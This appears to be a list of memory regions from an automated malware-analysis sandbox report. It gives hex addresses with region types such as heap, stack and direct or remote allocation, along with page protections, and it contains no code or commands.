15425F04000
heap
page read and write
2920B420000
heap
page read and write
15425F12000
heap
page read and write
1F174C27000
heap
page read and write
1F174492000
heap
page read and write
1F174E63000
heap
page read and write
7FFD93C30000
unkown
page readonly
15425F12000
heap
page read and write
1F17447C000
heap
page read and write
15425EFE000
heap
page read and write
2306511E000
heap
page read and write
1F176840000
direct allocation
page read and write
7FFDA0860000
unkown
page readonly
15425F04000
heap
page read and write
1A39914F000
heap
page read and write
22B3B100000
heap
page read and write
296865B0000
heap
page read and write
23063E8B000
heap
page read and write
7FFDA3601000
unkown
page execute read
F9F957E000
stack
page read and write
23064341000
heap
page read and write
15425F12000
heap
page read and write
7FFDA5491000
unkown
page execute read
23063E14000
heap
page read and write
15425F04000
heap
page read and write
1A399100000
remote allocation
page read and write
23063E55000
heap
page read and write
1F1728F0000
heap
page read and write
7FFD93CDC000
unkown
page read and write
23063CEA000
heap
page read and write
1F174840000
heap
page read and write
1F174428000
heap
page read and write
230643B5000
heap
page read and write
1F175020000
direct allocation
page read and write
21A8A9C0000
heap
page read and write
7FFD9F3B9000
unkown
page readonly
7FFD948A6000
unkown
page readonly
7FFD941E6000
unkown
page readonly
23063A50000
heap
page read and write
1F1747BE000
heap
page read and write
2920B46F000
heap
page read and write
7FF78F8EF000
unkown
page write copy
1D2C816D000
heap
page read and write
7FFDA3FD5000
unkown
page readonly
23064282000
heap
page read and write
57CEE7F000
stack
page read and write
1F174DF5000
heap
page read and write
1F174F7C000
heap
page read and write
7FFDA32F5000
unkown
page readonly
2306584C000
direct allocation
page read and write
182B9360000
heap
page read and write
95F44FF000
stack
page read and write
2039ABA8000
heap
page read and write
1F17435C000
direct allocation
page read and write
23063DC2000
heap
page read and write
202CBCF0000
heap
page read and write
2F3FAD3F000
heap
page read and write
1F174C83000
heap
page read and write
2306443A000
heap
page read and write
15425F04000
heap
page read and write
7FFD9DFC1000
unkown
page read and write
23064561000
heap
page read and write
230650AB000
heap
page read and write
1A399100000
remote allocation
page read and write
1FE2443F000
heap
page read and write
23063E50000
heap
page read and write
2306506E000
heap
page read and write
1BA29A52000
heap
page read and write
7FFD9F3D0000
unkown
page readonly
1F174801000
heap
page read and write
1F175940000
heap
page read and write
182B9540000
heap
page read and write
2306504E000
heap
page read and write
7FFDA3613000
unkown
page readonly
23063EAD000
heap
page read and write
2306427E000
heap
page read and write
15425F12000
heap
page read and write
1F174EE2000
heap
page read and write
23065FF8000
direct allocation
page read and write
23063A4B000
heap
page read and write
23063DAD000
heap
page read and write
230639D4000
heap
page read and write
23063E50000
heap
page read and write
2039AB9D000
heap
page read and write
1F174451000
heap
page read and write
230639FA000
heap
page read and write
23065E80000
direct allocation
page read and write
23063A5C000
heap
page read and write
2039AB9A000
heap
page read and write
23064431000
heap
page read and write
7FFDA3551000
unkown
page execute read
86C5AFC000
stack
page read and write
15425F04000
heap
page read and write
FB14FFE000
stack
page read and write
2039AB9A000
heap
page read and write
2306202B000
heap
page read and write
1F176840000
direct allocation
page read and write
7FFDA3BF1000
unkown
page execute read
7FFDA363F000
unkown
page readonly
2499F160000
heap
page read and write
1F17501C000
heap
page read and write
1F174DD0000
heap
page read and write
1F174885000
heap
page read and write
7FFDA3BF0000
unkown
page readonly
1F176990000
direct allocation
page read and write
23063A53000
heap
page read and write
2A7CF6D000
stack
page read and write
2039ABA8000
heap
page read and write
23063A35000
heap
page read and write
23FA0CA7000
heap
page read and write
1F174CE5000
heap
page read and write
1F174455000
heap
page read and write
15425F12000
heap
page read and write
1F174802000
heap
page read and write
1F17625C000
direct allocation
page read and write
23063D0E000
heap
page read and write
23064F3C000
heap
page read and write
23063EA5000
heap
page read and write
23063A5D000
heap
page read and write
1F174E51000
heap
page read and write
23064F9E000
heap
page read and write
1F1744B2000
heap
page read and write
1F176870000
direct allocation
page read and write
1695B285000
heap
page read and write
1F1748F6000
heap
page read and write
15425F04000
heap
page read and write
23063CEB000
heap
page read and write
1F1742D0000
heap
page read and write
1A399198000
heap
page read and write
23063D00000
heap
page read and write
23063EC0000
heap
page read and write
23063D70000
heap
page read and write
23063E1C000
heap
page read and write
23063D48000
heap
page read and write
23063D1C000
heap
page read and write
1F1758AF000
heap
page read and write
1F176840000
direct allocation
page read and write
7FFDA4168000
unkown
page readonly
2039AB9A000
heap
page read and write
23063E04000
heap
page read and write
23063D2D000
heap
page read and write
2039ABA8000
heap
page read and write
2039AB9A000
heap
page read and write
249E4EB0000
heap
page read and write
1D2C816C000
heap
page read and write
23063D2D000
heap
page read and write
1F176840000
direct allocation
page read and write
1F174885000
heap
page read and write
7FFDA3627000
unkown
page read and write
1F174CE3000
heap
page read and write
22924900000
heap
page read and write
230643B5000
heap
page read and write
7FFDA3544000
unkown
page readonly
23063A48000
heap
page read and write
230639CC000
heap
page read and write
230642A4000
heap
page read and write
1F174885000
heap
page read and write
1F176840000
direct allocation
page read and write
23064402000
heap
page read and write
2039AB99000
heap
page read and write
7FFDA5B81000
unkown
page execute read
23061FFE000
heap
page read and write
15ED9420000
heap
page read and write
23065EA0000
direct allocation
page read and write
1F172A55000
heap
page read and write
202CBDB4000
heap
page read and write
1F1759F7000
heap
page read and write
15425F04000
heap
page read and write
1A39914F000
heap
page read and write
1F17448E000
heap
page read and write
22924C35000
heap
page read and write
1F176840000
direct allocation
page read and write
1F1757F5000
heap
page read and write
2306443B000
heap
page read and write
1F1747BE000
heap
page read and write
2039AB9A000
heap
page read and write
1F1747B7000
heap
page read and write
2306399A000
heap
page read and write
1A399146000
heap
page read and write
15425F07000
heap
page read and write
7FFD9F3B0000
unkown
page readonly
1F17447C000
heap
page read and write
23063A33000
heap
page read and write
1F1747DF000
heap
page read and write
1F1747AE000
heap
page read and write
2306441A000
heap
page read and write
23063CF2000
heap
page read and write
23064306000
heap
page read and write
7FFD938A0000
unkown
page readonly
1F174482000
heap
page read and write
7FFDA4160000
unkown
page readonly
7FFDA3305000
unkown
page readonly
7FF7B7310000
unkown
page readonly
2306399E000
heap
page read and write
1F174E7F000
heap
page read and write
230650DD000
heap
page read and write
7FFD93D97000
unkown
page execute read
2039ABA7000
heap
page read and write
23063A77000
heap
page read and write
2C466870000
heap
page read and write
15425F04000
heap
page read and write
1F17449C000
heap
page read and write
E6490FF000
unkown
page read and write
21A8A7F0000
heap
page read and write
15425F13000
heap
page read and write
1F174C54000
heap
page read and write
23063E0F000
heap
page read and write
23064566000
heap
page read and write
1FE24380000
heap
page read and write
1F1758C3000
heap
page read and write
2039AB9F000
heap
page read and write
15425F13000
heap
page read and write
230639E6000
heap
page read and write
1F1748EB000
heap
page read and write
1F1747FE000
heap
page read and write
23065FD0000
direct allocation
page read and write
23FA0CCB000
heap
page read and write
7FFDA3A90000
unkown
page readonly
2306445D000
heap
page read and write
1F17442E000
heap
page read and write
15425F04000
heap
page read and write
7FFD9DF36000
unkown
page readonly
1F1757FC000
heap
page read and write
7FFDA5492000
unkown
page readonly
1F17449A000
heap
page read and write
1F174746000
heap
page read and write
23063A40000
heap
page read and write
230639FC000
heap
page read and write
1F174D67000
heap
page read and write
AD088FE000
stack
page read and write
2039AB9A000
heap
page read and write
1A399158000
heap
page read and write
7FFD94839000
unkown
page read and write
1F1747DD000
heap
page read and write
54EFB7C000
stack
page read and write
1F17501E000
heap
page read and write
23063D87000
heap
page read and write
1F174E7F000
heap
page read and write
1F174F10000
heap
page read and write
1F533FD0000
heap
page read and write
1F174C98000
heap
page read and write
2306442C000
heap
page read and write
7FFD93B72000
unkown
page readonly
23063EA0000
heap
page read and write
15425F12000
heap
page read and write
23063EAF000
heap
page read and write
230659C8000
direct allocation
page read and write
1F174F78000
heap
page read and write
1F1744B8000
heap
page read and write
23063E50000
heap
page read and write
23063D0F000
heap
page read and write
7FFD9480E000
unkown
page readonly
23063DF8000
heap
page read and write
23063E65000
heap
page read and write
23065EB0000
direct allocation
page read and write
1F174891000
heap
page read and write
1F175A93000
heap
page read and write
2306429F000
heap
page read and write
1F174CD6000
heap
page read and write
7FFD94432000
unkown
page execute read
1F174C6E000
heap
page read and write
23064467000
heap
page read and write
1F17586C000
heap
page read and write
2039AB9A000
heap
page read and write
7FFD947A6000
unkown
page readonly
7FFD93951000
unkown
page readonly
15425F11000
heap
page read and write
1F174C36000
heap
page read and write
23063E03000
heap
page read and write
7FFDA4160000
unkown
page readonly
7FF7B7310000
unkown
page readonly
65479DE000
stack
page read and write
230639B9000
heap
page read and write
1F174C84000
heap
page read and write
7FFDA3C00000
unkown
page readonly
1F176840000
direct allocation
page read and write
1F17489D000
heap
page read and write
1F1748CD000
heap
page read and write
15425F04000
heap
page read and write
1F176840000
direct allocation
page read and write
230639D4000
heap
page read and write
15425F04000
heap
page read and write
1F174484000
heap
page read and write
7FFDA3FD1000
unkown
page execute read
7FF7B7311000
unkown
page execute read
1F174482000
heap
page read and write
23065EB0000
direct allocation
page read and write
2039AB8C000
heap
page read and write
230643B6000
heap
page read and write
23064472000
heap
page read and write
23063D53000
heap
page read and write
1F174C20000
heap
page read and write
2306442A000
heap
page read and write
15ED9400000
heap
page read and write
1F17483E000
heap
page read and write
23065094000
heap
page read and write
7FFDA57F0000
unkown
page readonly
23063EBC000
heap
page read and write
23061FF3000
heap
page read and write
2039AB9A000
heap
page read and write
2306202E000
heap
page read and write
23063E14000
heap
page read and write
7FFDA3A95000
unkown
page readonly
230650D8000
heap
page read and write
15425F04000
heap
page read and write
1F1744B3000
heap
page read and write
7FFDA3570000
unkown
page readonly
23064330000
heap
page read and write
1F1747D9000
heap
page read and write
230642DF000
heap
page read and write
1F174E6F000
heap
page read and write
7FF78F8B1000
unkown
page execute read
23064A90000
heap
page read and write
1F17490E000
heap
page read and write
2039AB99000
heap
page read and write
7FFD9DF51000
unkown
page execute read
23064508000
heap
page read and write
23063A0B000
heap
page read and write
7FFD93C1F000
unkown
page readonly
1FE244BB000
heap
page read and write
1A399100000
remote allocation
page read and write
2039AB9A000
heap
page read and write
230642AB000
heap
page read and write
230644AC000
heap
page read and write
230650BD000
heap
page read and write
23064561000
heap
page read and write
23065047000
heap
page read and write
29686490000
heap
page read and write
7FFD9477A000
unkown
page write copy
1F174746000
heap
page read and write
1F176508000
heap
page read and write
23063E14000
heap
page read and write
23063EB2000
heap
page read and write
24082B00000
heap
page read and write
15425F12000
heap
page read and write
1F1747F3000
heap
page read and write
7FFD9DFEE000
unkown
page readonly
230642F6000
heap
page read and write
2039AB70000
heap
page read and write
1F172A6E000
heap
page read and write
1F176870000
direct allocation
page read and write
23063E69000
heap
page read and write
1F17594E000
heap
page read and write
23063E5C000
heap
page read and write
1F176840000
direct allocation
page read and write
2039AB9A000
heap
page read and write
1F174EC2000
heap
page read and write
1F1759CD000
heap
page read and write
2306503D000
heap
page read and write
7FFDA3C05000
unkown
page readonly
1F174CF2000
heap
page read and write
1F1759FA000
heap
page read and write
1F174C39000
heap
page read and write
23063A57000
heap
page read and write
1F17488E000
heap
page read and write
7FFD944C3000
unkown
page readonly
15425F12000
heap
page read and write
23063CD0000
heap
page read and write
7FF78F8EF000
unkown
page read and write
1F174873000
heap
page read and write
23064F7D000
heap
page read and write
1F1748C0000
heap
page read and write
1F174E4C000
heap
page read and write
230641F7000
heap
page read and write
2306200C000
heap
page read and write
7FFD9DFD0000
unkown
page readonly
1F176870000
direct allocation
page read and write
7FFDA3307000
unkown
page readonly
7FFDA3714000
unkown
page readonly
7FFDA3FD1000
unkown
page execute read
2039AB9A000
heap
page read and write
15425F12000
heap
page read and write
1F174EFA000
heap
page read and write
2B7C0210000
heap
page read and write
1F174499000
heap
page read and write
23064467000
heap
page read and write
274CF220000
heap
page read and write
2499F24D000
heap
page read and write
1F174C46000
heap
page read and write
23064F7D000
heap
page read and write
1F1747B7000
heap
page read and write
1F174C4E000
heap
page read and write
23065E80000
direct allocation
page read and write
23FA0CF4000
heap
page read and write
1F175812000
heap
page read and write
1F174EE2000
heap
page read and write
2039AB9A000
heap
page read and write
2039AB9A000
heap
page read and write
23065ED0000
direct allocation
page read and write
23063E5C000
heap
page read and write
7FFDA4DA2000
unkown
page readonly
1F17489D000
heap
page read and write
1F176840000
direct allocation
page read and write
7FFD9DFB0000
unkown
page readonly
1F1759FA000
heap
page read and write
23064F54000
heap
page read and write
1F176502000
heap
page read and write
1F175913000
heap
page read and write
1F17589E000
heap
page read and write
1F1748EB000
heap
page read and write
7FFDA3574000
unkown
page read and write
1F174D47000
heap
page read and write
7FFD93989000
unkown
page read and write
1F176840000
direct allocation
page read and write
15425F11000
heap
page read and write
23063D98000
heap
page read and write
230643CA000
heap
page read and write
23064228000
heap
page read and write
2F3FAD3F000
heap
page read and write
1F17448C000
heap
page read and write
23063E70000
heap
page read and write
22B3B4A5000
heap
page read and write
7FFDA3BF0000
unkown
page readonly
274CF405000
heap
page read and write
22924A10000
heap
page read and write
15425F06000
heap
page read and write
230642F5000
heap
page read and write
1F1747A2000
heap
page read and write
23064344000
heap
page read and write
1F176870000
direct allocation
page read and write
2039ABA1000
heap
page read and write
1F1758F0000
heap
page read and write
7FF78F8B1000
unkown
page execute read
230650D0000
heap
page read and write
1F174488000
heap
page read and write
23063DAE000
heap
page read and write
1F1747DD000
heap
page read and write
230639FC000
heap
page read and write
D5F29CE000
stack
page read and write
7FFDA35C0000
unkown
page readonly
23061E40000
heap
page read and write
1F174CF1000
heap
page read and write
1F174D27000
heap
page read and write
23065ED0000
direct allocation
page read and write
2306445C000
heap
page read and write
1F1747DC000
heap
page read and write
2C4666C2000
heap
page read and write
1F1747BE000
heap
page read and write
2274B0D0000
heap
page read and write
1F174CD4000
heap
page read and write
1F174ED0000
heap
page read and write
1F174D37000
heap
page read and write
1F174DE8000
heap
page read and write
23063DCF000
heap
page read and write
1F1747CF000
heap
page read and write
7FFDA0863000
unkown
page readonly
2039AB9A000
heap
page read and write
7FFDA2EA3000
unkown
page readonly
2306455A000
heap
page read and write
7FFD9E841000
unkown
page execute read
7FFD94131000
unkown
page execute read
23064FAE000
heap
page read and write
1F17585B000
heap
page read and write
1F174911000
heap
page read and write
12FF7EF0000
heap
page read and write
23063D3D000
heap
page read and write
23FA0CFC000
heap
page read and write
2306455D000
heap
page read and write
23065EA0000
direct allocation
page read and write
15425F04000
heap
page read and write
7FFDA4171000
unkown
page execute read
23063D83000
heap
page read and write
7FFDA35F4000
unkown
page readonly
23063DC9000
heap
page read and write
229249E0000
heap
page read and write
1A399284000
heap
page read and write
7FFD9F3C4000
unkown
page readonly
1F174EFF000
heap
page read and write
23063E14000
heap
page read and write
15425F04000
heap
page read and write
23064F7D000
heap
page read and write
15425F12000
heap
page read and write
23063EA3000
heap
page read and write
7FFDA35C1000
unkown
page execute read
2274B265000
heap
page read and write
1F174D29000
heap
page read and write
8BB30FE000
stack
page read and write
23064547000
heap
page read and write
1F174E42000
heap
page read and write
1F174C3E000
heap
page read and write
2039AB9A000
heap
page read and write
15425F13000
heap
page read and write
23064295000
heap
page read and write
2C466520000
heap
page read and write
15425F11000
heap
page read and write
23064F36000
heap
page read and write
230650B2000
heap
page read and write
23063D3F000
heap
page read and write
1F174885000
heap
page read and write
230641FC000
heap
page read and write
2039AB9A000
heap
page read and write
7FF7B7311000
unkown
page execute read
2039AB99000
heap
page read and write
7FFD93C24000
unkown
page readonly
1F1747FE000
heap
page read and write
23064293000
heap
page read and write
1D2C80A0000
heap
page read and write
15425F04000
heap
page read and write
7FFDA3601000
unkown
page execute read
1F174E96000
heap
page read and write
2039AB92000
heap
page read and write
1F174DCC000
heap
page read and write
7FFD942A1000
unkown
page execute read
2F3FAD19000
heap
page read and write
2F3FAD17000
heap
page read and write
23063CF3000
heap
page read and write
2039AB9A000
heap
page read and write
230642F4000
heap
page read and write
2039ABA7000
heap
page read and write
1F174476000
heap
page read and write
7FFD9F7F0000
unkown
page readonly
92D05AF000
stack
page read and write
1F174F8B000
heap
page read and write
1F1748AF000
heap
page read and write
1F1758F0000
heap
page read and write
23063D4B000
heap
page read and write
23064F8F000
heap
page read and write
7FFDA3FD3000
unkown
page readonly
1F1748C3000
heap
page read and write
7FFD93D72000
unkown
page execute read
230642AB000
heap
page read and write
23063A61000
heap
page read and write
23064FBC000
heap
page read and write
1F176870000
direct allocation
page read and write
7FFDA5472000
unkown
page readonly
23063D12000
heap
page read and write
230643B5000
heap
page read and write
7FFD94840000
unkown
page readonly
1F174F2D000
heap
page read and write
23063E4C000
heap
page read and write
182B93B4000
heap
page read and write
23063E50000
heap
page read and write
21A8A790000
heap
page read and write
1F176850000
direct allocation
page read and write
23064445000
heap
page read and write
2F3FAD39000
heap
page read and write
15425F04000
heap
page read and write
1F174E70000
heap
page read and write
23065844000
direct allocation
page read and write
7FFD93867000
unkown
page read and write
23062026000
heap
page read and write
1A399188000
heap
page read and write
23064700000
direct allocation
page read and write
23063DF3000
heap
page read and write
1F174D67000
heap
page read and write
23FA0F84000
heap
page read and write
23065EA0000
direct allocation
page read and write
23065EA0000
direct allocation
page read and write
1F174C52000
heap
page read and write
23064592000
heap
page read and write
1F174C88000
heap
page read and write
15425F04000
heap
page read and write
12FF7DF0000
heap
page read and write
7FFD93CEF000
unkown
page readonly
230645AE000
heap
page read and write
1F174CAD000
heap
page read and write
1F174C6D000
heap
page read and write
2039AB9A000
heap
page read and write
23061FF3000
heap
page read and write
1F534052000
heap
page read and write
1F174885000
heap
page read and write
7FFDA3C2C000
unkown
page readonly
23065930000
direct allocation
page read and write
1F17488D000
heap
page read and write
1F174FBF000
heap
page read and write
1F1747D6000
heap
page read and write
230639F9000
heap
page read and write
15425F04000
heap
page read and write
2306459E000
heap
page read and write
2306433D000
heap
page read and write
2499F243000
heap
page read and write
23064549000
heap
page read and write
1F174C5E000
heap
page read and write
1D2C816E000
heap
page read and write
23064561000
heap
page read and write
1F17476F000
heap
page read and write
1F17491E000
heap
page read and write
1F17489A000
heap
page read and write
7FFDA373C000
unkown
page read and write
1F17479C000
heap
page read and write
23063EC7000
heap
page read and write
1F1748AE000
heap
page read and write
7FFD9477C000
unkown
page write copy
23064587000
heap
page read and write
230641FD000
heap
page read and write
2039ABA7000
heap
page read and write
23064F34000
heap
page read and write
23063E67000
heap
page read and write
15425EE0000
heap
page read and write
15425F04000
heap
page read and write
1F174471000
heap
page read and write
23063EA0000
heap
page read and write
1F175A17000
heap
page read and write
15425F04000
heap
page read and write
23064561000
heap
page read and write
2039AB9A000
heap
page read and write
1F176840000
direct allocation
page read and write
2039ABA7000
heap
page read and write
23061FF8000
heap
page read and write
2039AB9A000
heap
page read and write
230639FA000
heap
page read and write
1F175019000
heap
page read and write
1F174EC0000
heap
page read and write
7FF78F8B0000
unkown
page readonly
23063A45000
heap
page read and write
1F1748AD000
heap
page read and write
2039AB9A000
heap
page read and write
23063E93000
heap
page read and write
23061FD7000
heap
page read and write
1F1748B7000
heap
page read and write
7FFD9DF33000
unkown
page readonly
15425F12000
heap
page read and write
15425F04000
heap
page read and write
23065E80000
direct allocation
page read and write
23064FCA000
heap
page read and write
1F176870000
direct allocation
page read and write
23063D56000
heap
page read and write
2920B450000
heap
page read and write
7FFDA3C01000
unkown
page execute read
1F174C8A000
heap
page read and write
15425F08000
heap
page read and write
1F1758C3000
heap
page read and write
1F174C9C000
heap
page read and write
2039ABA8000
heap
page read and write
23064595000
heap
page read and write
2306421D000
heap
page read and write
2274AF22000
heap
page read and write
23063D00000
heap
page read and write
7FFDA3A95000
unkown
page readonly
1F175A4B000
heap
page read and write
1F17593F000
heap
page read and write
1F176840000
direct allocation
page read and write
23065EA0000
direct allocation
page read and write
15425F04000
heap
page read and write
23065898000
direct allocation
page read and write
23064347000
heap
page read and write
23063A0B000
heap
page read and write
7FFDA3610000
unkown
page readonly
1F1748FE000
heap
page read and write
1A399182000
heap
page read and write
182B93FF000
heap
page read and write
15425D90000
heap
page read and write
23063E89000
heap
page read and write
7FFDA3741000
unkown
page readonly
2039ABA7000
heap
page read and write
23064F8E000
heap
page read and write
1F172A56000
heap
page read and write
7FFDA3620000
unkown
page readonly
1F174EEA000
heap
page read and write
23063DCC000
heap
page read and write
15425F04000
heap
page read and write
1F1747C0000
heap
page read and write
23063EAD000
heap
page read and write
There are 3808 hidden memdumps, click here to show them.